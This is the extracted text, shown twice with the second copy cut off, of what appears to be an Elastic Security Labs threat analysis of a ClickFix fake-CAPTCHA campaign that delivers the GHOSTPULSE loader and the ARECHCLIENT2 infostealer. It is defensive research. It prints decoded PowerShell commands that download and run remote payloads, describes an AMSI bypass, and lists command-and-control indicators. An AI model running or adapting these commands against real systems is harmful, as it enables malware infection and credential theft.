A Wretch Client: From ClickFix deception to information stealer deployment

ChatGPT paged: Each PDF page to text, then ChatGPT 4o (detailed)
Gemini 2.0: Full PDF with gemini-2.0-flash (8k output token limit)
Gemini 2.5: Full PDF with gemini-2.5-flash-preview-05-20 (65k output tokens limit)
Original: All text extracted from PDF

Original Text
A Wretch Client: From ClickFix deception to information stealerdeployment — Elastic Security LabsSalim BitamPreambleElastic Security Labs has observed the ClickFix technique gaining popularity for multi-stage campaigns that deliver various malware throughsocial engineering tactics.Our threat intelligence indicates a substantial surge in activity leveraging ClickFix (technique first observed) as a primary initial access vector.This social engineering technique tricks users into copying and pasting malicious PowerShell that results in malware execution. Our telemetryhas tracked its use since last year, including instances leading to the deployment of new versions of the GHOSTPULSE loader. This led tocampaigns targeting a broad audience using malware and infostealers, such as LUMMA and ARECHCLIENT2, a family first observed in 2019but now experiencing a significant surge in popularity.This post examines a recent ClickFix campaign, providing an in-depth analysis of its components, the techniques employed, and the malwareit ultimately delivers.Key takeawaysClickFix: Remains a highly effective and prevalent initial access method.GHOSTPULSE: Continues to be widely used as a multi-stage payload loader, featuring ongoing development with new modules andimproved evasion techniques. Notably, its initial configuration is delivered within an encrypted file.ARECHCLIENT2 (SECTOPRAT): Has seen a considerable increase in malicious activity throughout 2025.The Initial Hook: Deconstructing ClickFix's Social EngineeringEvery successful multi-stage attack begins with a foothold, and in many recent campaigns, that initial step has been satisfied by ClickFix.ClickFix leverages human psychology, transforming seemingly innocuous user interactions into the very launchpad for compromise. Fake captchaAt its core, ClickFix is a social engineering technique designed to manipulate users into inadvertently executing malicious code on theirsystems. It preys on common online behaviors and psychological tendencies, presenting users with deceptive prompts – often disguised asbrowser updates, system errors, or even CAPTCHA verifications. The trick is simple yet incredibly effective: instead of a direct download, theuser is instructed to copy a seemingly harmless "fix" (which is a malicious PowerShell command) and paste it directly into their operatingsystem's run dialog. This seemingly voluntary action bypasses many traditional perimeter defenses, as the user initiates the process.ClickFix first emerged on the threat landscape in March 2024, but it has rapidly gained traction, exploding in prevalence throughout 2024and continuing its aggressive ascent into 2025. Its effectiveness lies in exploiting "verification fatigue" – the subconscious habit users developof mindlessly clicking through security checks. When confronted with a familiar-looking CAPTCHA or an urgent "fix it" button, many users,conditioned by routine, simply comply without scrutinizing the underlying request. This makes ClickFix an incredibly potent initial accessvector, favored by a broad spectrum of threat actors due to its high success rate in breaching initial defenses.Our recent Elastic Security research on EDDIESTEALER provides another concrete example of ClickFix's efficacy in facilitating malwaredeployment, further underscoring its versatility and widespread adoption in the threat landscape.Our internal telemetry at Elastic corroborates this trend, showing a significant volume in ClickFix-related alerts across our observedenvironments, particularly within Q1 2025. We've noted an increase in attempts compared to the previous quarter, with a predominant focuson the deployment of mass infection malware, such as RATs and InfoStealers.A ClickFix Campaign's Journey to ARECHCLIENT2The ClickFix technique often serves as the initial step in a larger, multi-stage attack. We've recently analyzed a campaign that clearly showsthis progression. This operation begins with a ClickFix lure, which tricks users into starting the infection process. After gaining initial access,the campaign deploys an updated version of the GHOSTPULSE Loader (also known as HIJACKLOADER, IDATLOADER). This loaderthen brings in an intermediate .NET loader. This additional stage is responsible for delivering the final payload: an ARECHCLIENT2(SECTOPRAT) sample, loaded directly into memory. This particular attack chain demonstrates how adversaries combine social engineeringwith hidden loader capabilities and multiple execution layers to steal data and gain remote control ultimately. Execution flowWe observed this exact campaign in our telemetry on , providing us with a direct look into its real-world execution and the sequence of itscomponents. Execution flow in KibanaTechnical analysis of the infectionThe infection chain begins with a phishing page that imitates a Cloudflare anti-DDoS Captcha verification.We observed two infrastructures (both resolving to 50.57.243[.]90) https://clients[.]dealeronlinemarketing[[.]]com/captcha/and https://clients[.]contology[.]com/captcha/ that deliver the same initial payload.User interaction on this page initiates execution. GHOSTPULSE serves as the malware loader in this campaign. Elastic Security Labs has beenclosely tracking this loader, and our previous research (2023 and2024) provided a detailed look into its initial capabilities. Fake captcha hosted by contology[.]comThe webpage is a heavily obfuscated JavaScript script that generates the HTML code and JavaScript, which copies a PowerShell command tothe clipboard. Obfuscated JavaScript of the captcha pageInspecting the runtime HTML code in a browser, we can see the front end of the page, but not the script that is run after clicking on thecheckbox Verify you are human.HTML code of the captcha pageA simple solution is to run it in a debugger to retrieve the information during execution. The second JS code is obfuscated, but we can easilyidentify two interesting functions. The first function, runClickedCheckboxEffects, retrieves the public IP address of the machine byquerying https://api.ipify[.]org?format=json, then it sends the IP address to the attacker’s infrastructure, https://koonenmagaziner[.]click/counter/<IP_address>, to log the infection.JavaScript of the captcha pageThe second function copies a base64-encoded PowerShell command to the clipboard. Command copied to the clipboard by the JavaScript scriptPowerShell command copied to the clipboardWhich is the following when it is base64 decoded(Invoke-webrequest -URI 'https://shorter[.]me/XOWyT' -UseBasicParsing).content \| iexWhen executed, it fetches the following PowerShell script:Invoke-WebRequest -Uri "https://bitly[.]cx/iddD" -OutFile "$env:TEMP\ComponentStyle.zip"; Expand-Archive -Path "$env:TEMP/ComponentStyle.zip" -DestinationPath "$env:TEMP"; & "$env:TEMP\crystall\Crysta_x86.exe"The observed infection process for this campaign involves GHOSTPULSE's deployment as follows: After the user executes the PowerShellcommand copied by ClickFix, the initial script fetches and runs additional commands. These PowerShell commands download a ZIP file(ComponentStyle.zip) from a remote location and then extract it into a temporary directory on the victim's system.Extracted contents include components for GHOSTPULSE, specifically a benign executable (Crysta_X64.exe) and a malicious dynamic-link library (DllXDownloadManager.dll). This setup utilizes DLL sideloading, a technique in which the legitimate executable loads themalicious DLL. The file (Heeschamjet.rc) is the IDAT file that contains the next stage's payloads in an encrypted formatand the file Shonomteak.bxi, which is encrypted and used by the loader to fetch the stage 2 and configuration structure. Content of ComponentStyle.zipGHOSTPULSEStage 1GHOSTPULSE is malware dating back to 2023. It has continuously received numerous updates, including a new way to store its encryptedpayload in an image by embedding the payload in the PNG’s pixels, as detailed in Elastic’s 2024 research blog post, and new modules fromZscaler research.The malware used in this campaign was shipped with an additional encrypted file named Shonomteak.bxi. During stage 1 of the loader, itdecrypts the file using a DWORD addition operation with a value stored in the file itself. Decryption of Shonomteak.bxi fileThe malware then extracts the stage 2 code from the decrypted file Shonomteak.bxi and injects it into a loaded library using theLibraryLoadA function. The library name is stored in the same decrypted file; in our case, it is vssapi.dll.The stage 2 function is then called with a structure parameter containing the filename of the IDAT PNG file, the stage 2 configuration thatwas inside the decrypted Shonomteak.bxi, and a boolean field b_detect_process set to True in our case. Structure used in stage 2Stage 2When the boolean field b_detect_process is set to True, the malware executes a function that checks for a list of processes to see if they arerunning. If a process is detected, execution is delayed by 5 seconds. Delays execution by 5 secondsIn previous samples, we analyzed GHOSTPULSE, which had its configuration hardcoded directly in the binary. This sample, on the otherhand, has all the necessary information required for the malware to function properly, stored in Shonomteak.bxi, including:Hashes for the DLL names and Windows APIsIDAT tag: used to find the start of the encrypted data in the PNG fileIDAT string: Which is simply “IDAT”Hashes of processes to scan for API fetching hashes stored in GHOSTPULSE configuration rather than hardcodedFinal thoughts on GHOSTPULSEGHOSTPULSE has seen multiple updates. The use of the IDAT header method to store the encrypted payload, rather than the new methodwe discovered in 2024, which utilizes pixels to store the payload, may indicate that the builder of this family maintained both options forcompiling new samples.Our configuration extractor performs payload extraction using both methods and can be used for mass analysis on samples. You can find theupdated tool in our labs-releases repository. Payload extraction from the GHOSTPULSE sampleARECHCLIENT2In 2025, a notable increase in activity involving ARECHCLIENT2 (SectopRAT) was observed. This heavily obfuscated .NET remote accesstool, initially identified in November 2019 and known for its information-stealing features, is now being deployed by GHOSTPULSE throughthe Clickfix social engineering technique. Our prior research documented the initial deployment of GHOSTPULSE utilizing ARECHCLIENT2around 2023.The payload deployed by GHOSTPULSE in a newly created process is an x86 native .NET loader, which in its turn loads ARECHCLIENT2.The loader goes through 3 steps:Patching AMSIExtracting and decrypting the payloadLoading the CLR, then reflectively loading ARECHCLIENT2 Main entry of the .NET loaderInterestingly, its error handling for debugging purposes is still present, in the form of message boxes using the MessageBoxA API, forexample, when failing to find the .tls section, an error message box with the string "D1" is displayed. Debugging/error messages through a message boxThe following is a table of all the error messages and their description:Message DescriptionF1LoadLibraryExW hooking failedF2 AMSI patching failedD1 Unable to find .tls sectionW2 Failed to load CLRThe malware sets up a hook on the LoadLibraryExW API. This hook waits for amsi.dll to be loaded, then sets another hook onAmsiScanBuffer 0, effectively bypassing AMSI. Hooking LoadLibraryExWAfter this, the loader fetches the pointer in memory to the .tls section by parsing the PE headers. The first 0x40 bytes of this section serve asthe XOR key, and the rest of the bytes contain the encrypted ARECHCLIENT2 sample, which the loader then decrypts. Payload decryption routineFinally, it loads the .NET Common Language Runtime (CLR) in memory with CLRCreateInstance Windows API before reflectively loadingARECHCLIENT2. The following is an example of how it is performed.ARECHCLIENT2 is a potent remote access trojan and infostealer, designed to target a broad spectrum of sensitive user data and systeminformation. The malware's core objectives primarily focus on:Credential and Financial Theft: ARECHCLIENT2 explicitly targets cryptocurrency wallets, browser-saved passwords, cookies, andautofill data. It also aims for credentials from FTP, VPN, Telegram, Discord, and Steam. DNSPY view of the StealerSettingConfigParce classSystem Profiling and Reconnaissance: ARECHCLIENT2 gathers extensive system details, including the operating system version,hardware information, IP address, machine name, and geolocation (city, country, and time zone). We've identified that both entities are linked to a digital advertising agency with a long operational history. Further investigation reveals thatthe company has consistently utilized client subdomains to host various content, including PDFs and forms, for advertising purposes.We assess that the attacker has likely compromised the server 50.57.243[.]90 and is leveraging it by exploiting the company's existinginfrastructure and advertising reach to facilitate widespread malicious activity.Further down the attack chain, analysis of the ARECHCLIENT2 C2 IPs (143.110.230[.]167 and 144.172.97[.]2) revealed additionalcampaign infrastructure. Both servers are hosted on different autonomous systems, AS14061 and AS14956.Pivoting on a shared banner hash (@ValidinLLC’s HOST-BANNER_0_HASH, which is the hash value of the web server response banners)revealed 120 unique servers across a range of autonomous systems over the last seven months. Of these 120, 19 have been previously labeledby various other vendors as “Sectop RAT” (aka ARECHCLIENT2) as documented in the maltrail repo. DNSPY view of ScanResult classCommand Execution: ARECHCLIENT2 receives and executes commands from its command-and-control (C2) server, granting attackersremote control over infected systems.The ARECHCLIENT2 malware connects to its C2 144.172.97[.]2, which is hardcoded in the binary as an encrypted string, and alsoretrieves its secondary C2 (143.110.230[.]167) IP from a hardcoded pastebin link https://pastebin[.]com/raw/Wg8DHh2x. ARECHCLIENT2 configuration from DNSPYInfrastructure analysisThe malicious captcha page was hosted under two domains clients.dealeronlinemarketing[.]com and clients.contology[.]comunder the URI /captcha and /Client pointing to the following IP address 50.57.243[.]90. ARECHCLIENT2 C2 Server Profile, courtesy @censysioThe service on port 9000 has Windows server headers, whereas the SSH and NGINX HTTP services both specify Ubuntu as the operatingsystem. This suggests a reverse proxy of the C2 to protect the actual C2team server by maintaining disposable front-end redirectors.ARECHCLIENT2 IOC:HOST-BANNER_0_HASH: 82cddf3a9bff315d8fc708e5f5f85f20This is an active campaign, and this infrastructure is being built and torn down at a high cadence over the last seven months. As ofpublication, the following C2 nodes are still active:Value First Seen Last Seen66.63.187.222025-06-15 2025-06-1545.94.47.1642025-06-02 2025-06-1584.200.17.1292025-06-04 2025-06-1582.117.255.2252025-03-14 2025-06-1545.77.154.1152025-06-05 2025-06-15144.172.94.1202025-05-20 2025-06-1579.124.62.102025-05-15 2025-06-1582.117.242.1782025-03-14 2025-06-15195.82.147.1322025-04-10 2025-06-1562.60.247.1542025-05-18 2025-06-1591.199.163.742025-04-03 2025-06-15172.86.72.812025-03-13 2025-06-15107.189.24.672025-06-02 2025-06-15143.110.230.1672025-06-08 2025-06-15185.156.72.802025-05-15 2025-06-1585.158.110.1792025-05-11 2025-06-15144.172.101.2282025-05-13 2025-06-15192.124.178.2442025-06-01 2025-06-15107.189.18.562025-04-27 2025-06-15194.87.29.622025-05-18 2025-06-15185.156.72.632025-06-12 2025-06-12193.149.176.312025-06-08 2025-06-12 ARECHCLIENT2 Host Banner Hash Pivot, courtesy @ValidinLLCPerforming focused validations of the latest occurrences (first occurrence after June 1, 2025) against VirusTotal shows community membershave previously labeled all 13 as Sectop RAT C2.All these servers have similar configurations:Running Canonical LinuxSSH on 22Unknown TCP on 443Nginx HTTP on 8080, andHTTP on 9000 (C2 port) Value First Seen Last Seen45.141.87.2492025-06-12 2025-06-12176.126.163.562025-05-06 2025-06-12185.156.72.712025-05-15 2025-06-1291.184.242.372025-05-15 2025-06-1245.141.86.1592025-05-15 2025-06-1267.220.72.1242025-06-05 2025-06-1245.118.248.292025-01-28 2025-06-12172.105.148.2332025-06-03 2025-06-10194.26.27.102025-05-06 2025-06-1045.141.87.2122025-06-08 2025-06-0845.141.86.1492025-05-15 2025-06-08172.235.190.1762025-06-08 2025-06-0845.141.86.822024-12-13 2025-06-0845.141.87.72025-05-13 2025-06-06185.125.50.1402025-04-06 2025-06-03ConclusionThis multi-stage cyber campaign effectively leverages ClickFix social engineering for initial access, deploying the GHOSTPULSE loader todeliver an intermediate .NET loader, ultimately culminating in the memory-resident ARECHCLIENT2 payload. This layered attack chaingathers extensive credentials, financial, and system data, while also granting attackers remote control capabilities over compromisedmachines.MITRE ATT&CKElastic uses the MITRE ATT&CK framework to document common tactics, techniques, and procedures that advanced persistent threats useagainst enterprise networks.TacticsTactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.Initial AccessExecutionDefense EvasionCommand and ControlCollectionTechniquesTechniques represent how an adversary achieves a tactical goal by performing an action.PhishingSpearphishing LinkUser ExecutionMalicious LinkMalicious FileCommand and Scripting InterpreterPowerShellDeobfuscation/DecodingDLL Sideloading Reflective LoadingUser InteractionIngress Tool TransferSystem Information DiscoveryProcess DiscoverySteal Web Session CookieDetecting [malware]DetectionElastic Defend detects this threat with the following behavior protection rules:Suspicious Command Shell Execution via Windows RunDNS Query to Suspicious Top Level DomainLibrary Load of a File Written by a Signed Binary ProxyConnection to WebService by a Signed Binary ProxyPotential Browser Information DiscoveryYARAWindows_Trojan_GhostPulseWindows_Trojan_Arechclient2ObservationsThe following observables were discussed in this research.Observable Type Name Referenceclients.dealeronlinemarketing[.]comdomain Captcha subdomainclients.contology[.]comdomain Captcha subdomainkoonenmagaziner[.]clickdomain50.57.243[.]90ipv4-addrclients.dealeronlinemarketing[.]com& clients.contology[.]com IPaddress144.172.97[.]2ipv4-addrARECHCLIENT2 C&C server143.110.230[.]167ipv4-addrARECHCLIENT2 C&C serverpastebin[.]com/raw/Wg8DHh2xipv4-addrContains ARECHCLIENT2 C&Cserver IP2ec47cbe6d03e6bdcccc63c936d1c8310c261755ae5485295fecac4836d7e56aSHA-256DivXDownloadManager.dllGHOSTPULSEa8ba1e14249cdd9d806ef2d56bedd5fb09de920b6f78082d1af3634f4c136b90SHA-256Heeschamjiet.rcPNG GHOSTPULSEf92b491d63bb77ed3b4c7741c8c15bdb7c44409f1f850c08dce170f5c8712d55SHA-256 DOTNET LOADER4dc5ba5014628ad0c85f6e8903de4dd3b49fed65796978988df8c128ba7e7de9SHA-256 ARECHCLIENT2ReferencesThe following were referenced throughout the above research:https://x.com/SI_FalconTeam/status/1915790796948643929https://www.zscaler.com/blogs/security-research/analyzing-new-hijackloader-evasion-tactics

Original Text

A Wretch Client: From ClickFix deception to information stealerdeployment — Elastic Security LabsSalim BitamPreambleElastic Security Labs has observed the ClickFix technique gaining popularity for multi-stage campaigns that deliver various malware throughsocial engineering tactics.Our threat intelligence indicates a substantial surge in activity leveraging ClickFix (technique first observed) as a primary initial access vector.This social engineering technique tricks users into copying and pasting malicious PowerShell that results in malware execution. Our telemetryhas tracked its use since last year, including instances leading to the deployment of new versions of the GHOSTPULSE loader. This led tocampaigns targeting a broad audience using malware and infostealers, such as LUMMA and ARECHCLIENT2, a family first observed in 2019but now experiencing a significant surge in popularity.This post examines a recent ClickFix campaign, providing an in-depth analysis of its components, the techniques employed, and the malwareit ultimately delivers.Key takeawaysClickFix: Remains a highly effective and prevalent initial access method.GHOSTPULSE: Continues to be widely used as a multi-stage payload loader, featuring ongoing development with new modules andimproved evasion techniques. Notably, its initial configuration is delivered within an encrypted file.ARECHCLIENT2 (SECTOPRAT): Has seen a considerable increase in malicious activity throughout 2025.The Initial Hook: Deconstructing ClickFix's Social EngineeringEvery successful multi-stage attack begins with a foothold, and in many recent campaigns, that initial step has been satisfied by ClickFix.ClickFix leverages human psychology, transforming seemingly innocuous user interactions into the very launchpad for compromise. Fake captchaAt its core, ClickFix is a social engineering technique designed to manipulate users into inadvertently executing malicious code on theirsystems. It preys on common online behaviors and psychological tendencies, presenting users with deceptive prompts – often disguised asbrowser updates, system errors, or even CAPTCHA verifications. The trick is simple yet incredibly effective: instead of a direct download, theuser is instructed to copy a seemingly harmless "fix" (which is a malicious PowerShell command) and paste it directly into their operatingsystem's run dialog. This seemingly voluntary action bypasses many traditional perimeter defenses, as the user initiates the process.ClickFix first emerged on the threat landscape in March 2024, but it has rapidly gained traction, exploding in prevalence throughout 2024and continuing its aggressive ascent into 2025. Its effectiveness lies in exploiting "verification fatigue" – the subconscious habit users developof mindlessly clicking through security checks. When confronted with a familiar-looking CAPTCHA or an urgent "fix it" button, many users,conditioned by routine, simply comply without scrutinizing the underlying request. This makes ClickFix an incredibly potent initial accessvector, favored by a broad spectrum of threat actors due to its high success rate in breaching initial defenses.Our recent Elastic Security research on EDDIESTEALER provides another concrete example of ClickFix's efficacy in facilitating malwaredeployment, further underscoring its versatility and widespread adoption in the threat landscape.Our internal telemetry at Elastic corroborates this trend, showing a significant volume in ClickFix-related alerts across our observedenvironments, particularly within Q1 2025. We've noted an increase in attempts compared to the previous quarter, with a predominant focuson the deployment of mass infection malware, such as RATs and InfoStealers.A ClickFix Campaign's Journey to ARECHCLIENT2The ClickFix technique often serves as the initial step in a larger, multi-stage attack. We've recently analyzed a campaign that clearly showsthis progression. This operation begins with a ClickFix lure, which tricks users into starting the infection process. After gaining initial access,the campaign deploys an updated version of the GHOSTPULSE Loader (also known as HIJACKLOADER, IDATLOADER). This loaderthen brings in an intermediate .NET loader. This additional stage is responsible for delivering the final payload: an ARECHCLIENT2(SECTOPRAT) sample, loaded directly into memory. This particular attack chain demonstrates how adversaries combine social engineeringwith hidden loader capabilities and multiple execution layers to steal data and gain remote control ultimately. Execution flowWe observed this exact campaign in our telemetry on , providing us with a direct look into its real-world execution and the sequence of itscomponents. Execution flow in KibanaTechnical analysis of the infectionThe infection chain begins with a phishing page that imitates a Cloudflare anti-DDoS Captcha verification.We observed two infrastructures (both resolving to 50.57.243[.]90) https://clients[.]dealeronlinemarketing[[.]]com/captcha/and https://clients[.]contology[.]com/captcha/ that deliver the same initial payload.User interaction on this page initiates execution. GHOSTPULSE serves as the malware loader in this campaign. Elastic Security Labs has beenclosely tracking this loader, and our previous research (2023 and2024) provided a detailed look into its initial capabilities. Fake captcha hosted by contology[.]comThe webpage is a heavily obfuscated JavaScript script that generates the HTML code and JavaScript, which copies a PowerShell command tothe clipboard. Obfuscated JavaScript of the captcha pageInspecting the runtime HTML code in a browser, we can see the front end of the page, but not the script that is run after clicking on thecheckbox Verify you are human.HTML code of the captcha pageA simple solution is to run it in a debugger to retrieve the information during execution. The second JS code is obfuscated, but we can easilyidentify two interesting functions. The first function, runClickedCheckboxEffects, retrieves the public IP address of the machine byquerying https://api.ipify[.]org?format=json, then it sends the IP address to the attacker’s infrastructure, https://koonenmagaziner[.]click/counter/<IP_address>, to log the infection.JavaScript of the captcha pageThe second function copies a base64-encoded PowerShell command to the clipboard. Command copied to the clipboard by the JavaScript scriptPowerShell command copied to the clipboardWhich is the following when it is base64 decoded(Invoke-webrequest -URI 'https://shorter[.]me/XOWyT' -UseBasicParsing).content | iexWhen executed, it fetches the following PowerShell script:Invoke-WebRequest -Uri "https://bitly[.]cx/iddD" -OutFile "$env:TEMP\ComponentStyle.zip"; Expand-Archive -Path "$env:TEMP/ComponentStyle.zip" -DestinationPath "$env:TEMP"; & "$env:TEMP\crystall\Crysta_x86.exe"The observed infection process for this campaign involves GHOSTPULSE's deployment as follows: After the user executes the PowerShellcommand copied by ClickFix, the initial script fetches and runs additional commands. These PowerShell commands download a ZIP file(ComponentStyle.zip) from a remote location and then extract it into a temporary directory on the victim's system.Extracted contents include components for GHOSTPULSE, specifically a benign executable (Crysta_X64.exe) and a malicious dynamic-link library (DllXDownloadManager.dll). This setup utilizes DLL sideloading, a technique in which the legitimate executable loads themalicious DLL. The file (Heeschamjet.rc) is the IDAT file that contains the next stage's payloads in an encrypted formatand the file Shonomteak.bxi, which is encrypted and used by the loader to fetch the stage 2 and configuration structure. Content of ComponentStyle.zipGHOSTPULSEStage 1GHOSTPULSE is malware dating back to 2023. It has continuously received numerous updates, including a new way to store its encryptedpayload in an image by embedding the payload in the PNG’s pixels, as detailed in Elastic’s 2024 research blog post, and new modules fromZscaler research.The malware used in this campaign was shipped with an additional encrypted file named Shonomteak.bxi. During stage 1 of the loader, itdecrypts the file using a DWORD addition operation with a value stored in the file itself. Decryption of Shonomteak.bxi fileThe malware then extracts the stage 2 code from the decrypted file Shonomteak.bxi and injects it into a loaded library using theLibraryLoadA function. The library name is stored in the same decrypted file; in our case, it is vssapi.dll.The stage 2 function is then called with a structure parameter containing the filename of the IDAT PNG file, the stage 2 configuration thatwas inside the decrypted Shonomteak.bxi, and a boolean field b_detect_process set to True in our case. Structure used in stage 2Stage 2When the boolean field b_detect_process is set to True, the malware executes a function that checks for a list of processes to see if they arerunning. If a process is detected, execution is delayed by 5 seconds. Delays execution by 5 secondsIn previous samples, we analyzed GHOSTPULSE, which had its configuration hardcoded directly in the binary. This sample, on the otherhand, has all the necessary information required for the malware to function properly, stored in Shonomteak.bxi, including:Hashes for the DLL names and Windows APIsIDAT tag: used to find the start of the encrypted data in the PNG fileIDAT string: Which is simply “IDAT”Hashes of processes to scan for API fetching hashes stored in GHOSTPULSE configuration rather than hardcodedFinal thoughts on GHOSTPULSEGHOSTPULSE has seen multiple updates. The use of the IDAT header method to store the encrypted payload, rather than the new methodwe discovered in 2024, which utilizes pixels to store the payload, may indicate that the builder of this family maintained both options forcompiling new samples.Our configuration extractor performs payload extraction using both methods and can be used for mass analysis on samples. You can find theupdated tool in our labs-releases repository. Payload extraction from the GHOSTPULSE sampleARECHCLIENT2In 2025, a notable increase in activity involving ARECHCLIENT2 (SectopRAT) was observed. This heavily obfuscated .NET remote accesstool, initially identified in November 2019 and known for its information-stealing features, is now being deployed by GHOSTPULSE throughthe Clickfix social engineering technique. Our prior research documented the initial deployment of GHOSTPULSE utilizing ARECHCLIENT2around 2023.The payload deployed by GHOSTPULSE in a newly created process is an x86 native .NET loader, which in its turn loads ARECHCLIENT2.The loader goes through 3 steps:Patching AMSIExtracting and decrypting the payloadLoading the CLR, then reflectively loading ARECHCLIENT2 Main entry of the .NET loaderInterestingly, its error handling for debugging purposes is still present, in the form of message boxes using the MessageBoxA API, forexample, when failing to find the .tls section, an error message box with the string "D1" is displayed. Debugging/error messages through a message boxThe following is a table of all the error messages and their description:Message DescriptionF1LoadLibraryExW hooking failedF2 AMSI patching failedD1 Unable to find .tls sectionW2 Failed to load CLRThe malware sets up a hook on the LoadLibraryExW API. This hook waits for amsi.dll to be loaded, then sets another hook onAmsiScanBuffer 0, effectively bypassing AMSI. Hooking LoadLibraryExWAfter this, the loader fetches the pointer in memory to the .tls section by parsing the PE headers. The first 0x40 bytes of this section serve asthe XOR key, and the rest of the bytes contain the encrypted ARECHCLIENT2 sample, which the loader then decrypts. Payload decryption routineFinally, it loads the .NET Common Language Runtime (CLR) in memory with CLRCreateInstance Windows API before reflectively loadingARECHCLIENT2. The following is an example of how it is performed.ARECHCLIENT2 is a potent remote access trojan and infostealer, designed to target a broad spectrum of sensitive user data and systeminformation. The malware's core objectives primarily focus on:Credential and Financial Theft: ARECHCLIENT2 explicitly targets cryptocurrency wallets, browser-saved passwords, cookies, andautofill data. It also aims for credentials from FTP, VPN, Telegram, Discord, and Steam. DNSPY view of the StealerSettingConfigParce classSystem Profiling and Reconnaissance: ARECHCLIENT2 gathers extensive system details, including the operating system version,hardware information, IP address, machine name, and geolocation (city, country, and time zone). We've identified that both entities are linked to a digital advertising agency with a long operational history. Further investigation reveals thatthe company has consistently utilized client subdomains to host various content, including PDFs and forms, for advertising purposes.We assess that the attacker has likely compromised the server 50.57.243[.]90 and is leveraging it by exploiting the company's existinginfrastructure and advertising reach to facilitate widespread malicious activity.Further down the attack chain, analysis of the ARECHCLIENT2 C2 IPs (143.110.230[.]167 and 144.172.97[.]2) revealed additionalcampaign infrastructure. Both servers are hosted on different autonomous systems, AS14061 and AS14956.Pivoting on a shared banner hash (@ValidinLLC’s HOST-BANNER_0_HASH, which is the hash value of the web server response banners)revealed 120 unique servers across a range of autonomous systems over the last seven months. Of these 120, 19 have been previously labeledby various other vendors as “Sectop RAT” (aka ARECHCLIENT2) as documented in the maltrail repo. DNSPY view of ScanResult classCommand Execution: ARECHCLIENT2 receives and executes commands from its command-and-control (C2) server, granting attackersremote control over infected systems.The ARECHCLIENT2 malware connects to its C2 144.172.97[.]2, which is hardcoded in the binary as an encrypted string, and alsoretrieves its secondary C2 (143.110.230[.]167) IP from a hardcoded pastebin link https://pastebin[.]com/raw/Wg8DHh2x. ARECHCLIENT2 configuration from DNSPYInfrastructure analysisThe malicious captcha page was hosted under two domains clients.dealeronlinemarketing[.]com and clients.contology[.]comunder the URI /captcha and /Client pointing to the following IP address 50.57.243[.]90. ARECHCLIENT2 C2 Server Profile, courtesy @censysioThe service on port 9000 has Windows server headers, whereas the SSH and NGINX HTTP services both specify Ubuntu as the operatingsystem. This suggests a reverse proxy of the C2 to protect the actual C2team server by maintaining disposable front-end redirectors.ARECHCLIENT2 IOC:HOST-BANNER_0_HASH: 82cddf3a9bff315d8fc708e5f5f85f20This is an active campaign, and this infrastructure is being built and torn down at a high cadence over the last seven months. As ofpublication, the following C2 nodes are still active:Value First Seen Last Seen66.63.187.222025-06-15 2025-06-1545.94.47.1642025-06-02 2025-06-1584.200.17.1292025-06-04 2025-06-1582.117.255.2252025-03-14 2025-06-1545.77.154.1152025-06-05 2025-06-15144.172.94.1202025-05-20 2025-06-1579.124.62.102025-05-15 2025-06-1582.117.242.1782025-03-14 2025-06-15195.82.147.1322025-04-10 2025-06-1562.60.247.1542025-05-18 2025-06-1591.199.163.742025-04-03 2025-06-15172.86.72.812025-03-13 2025-06-15107.189.24.672025-06-02 2025-06-15143.110.230.1672025-06-08 2025-06-15185.156.72.802025-05-15 2025-06-1585.158.110.1792025-05-11 2025-06-15144.172.101.2282025-05-13 2025-06-15192.124.178.2442025-06-01 2025-06-15107.189.18.562025-04-27 2025-06-15194.87.29.622025-05-18 2025-06-15185.156.72.632025-06-12 2025-06-12193.149.176.312025-06-08 2025-06-12 ARECHCLIENT2 Host Banner Hash Pivot, courtesy @ValidinLLCPerforming focused validations of the latest occurrences (first occurrence after June 1, 2025) against VirusTotal shows community membershave previously labeled all 13 as Sectop RAT C2.All these servers have similar configurations:Running Canonical LinuxSSH on 22Unknown TCP on 443Nginx HTTP on 8080, andHTTP on 9000 (C2 port) Value First Seen Last Seen45.141.87.2492025-06-12 2025-06-12176.126.163.562025-05-06 2025-06-12185.156.72.712025-05-15 2025-06-1291.184.242.372025-05-15 2025-06-1245.141.86.1592025-05-15 2025-06-1267.220.72.1242025-06-05 2025-06-1245.118.248.292025-01-28 2025-06-12172.105.148.2332025-06-03 2025-06-10194.26.27.102025-05-06 2025-06-1045.141.87.2122025-06-08 2025-06-0845.141.86.1492025-05-15 2025-06-08172.235.190.1762025-06-08 2025-06-0845.141.86.822024-12-13 2025-06-0845.141.87.72025-05-13 2025-06-06185.125.50.1402025-04-06 2025-06-03ConclusionThis multi-stage cyber campaign effectively leverages ClickFix social engineering for initial access, deploying the GHOSTPULSE loader todeliver an intermediate .NET loader, ultimately culminating in the memory-resident ARECHCLIENT2 payload. This layered attack chaingathers extensive credentials, financial, and system data, while also granting attackers remote control capabilities over compromisedmachines.MITRE ATT&CKElastic uses the MITRE ATT&CK framework to document common tactics, techniques, and procedures that advanced persistent threats useagainst enterprise networks.TacticsTactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.Initial AccessExecutionDefense EvasionCommand and ControlCollectionTechniquesTechniques represent how an adversary achieves a tactical goal by performing an action.PhishingSpearphishing LinkUser ExecutionMalicious LinkMalicious FileCommand and Scripting InterpreterPowerShellDeobfuscation/DecodingDLL Sideloading Reflective LoadingUser InteractionIngress Tool TransferSystem Information DiscoveryProcess DiscoverySteal Web Session CookieDetecting [malware]DetectionElastic Defend detects this threat with the following behavior protection rules:Suspicious Command Shell Execution via Windows RunDNS Query to Suspicious Top Level DomainLibrary Load of a File Written by a Signed Binary ProxyConnection to WebService by a Signed Binary ProxyPotential Browser Information DiscoveryYARAWindows_Trojan_GhostPulseWindows_Trojan_Arechclient2ObservationsThe following observables were discussed in this research.Observable Type Name Referenceclients.dealeronlinemarketing[.]comdomain Captcha subdomainclients.contology[.]comdomain Captcha subdomainkoonenmagaziner[.]clickdomain50.57.243[.]90ipv4-addrclients.dealeronlinemarketing[.]com& clients.contology[.]com IPaddress144.172.97[.]2ipv4-addrARECHCLIENT2 C&C server143.110.230[.]167ipv4-addrARECHCLIENT2 C&C serverpastebin[.]com/raw/Wg8DHh2xipv4-addrContains ARECHCLIENT2 C&Cserver IP2ec47cbe6d03e6bdcccc63c936d1c8310c261755ae5485295fecac4836d7e56aSHA-256DivXDownloadManager.dllGHOSTPULSEa8ba1e14249cdd9d806ef2d56bedd5fb09de920b6f78082d1af3634f4c136b90SHA-256Heeschamjiet.rcPNG GHOSTPULSEf92b491d63bb77ed3b4c7741c8c15bdb7c44409f1f850c08dce170f5c8712d55SHA-256 DOTNET 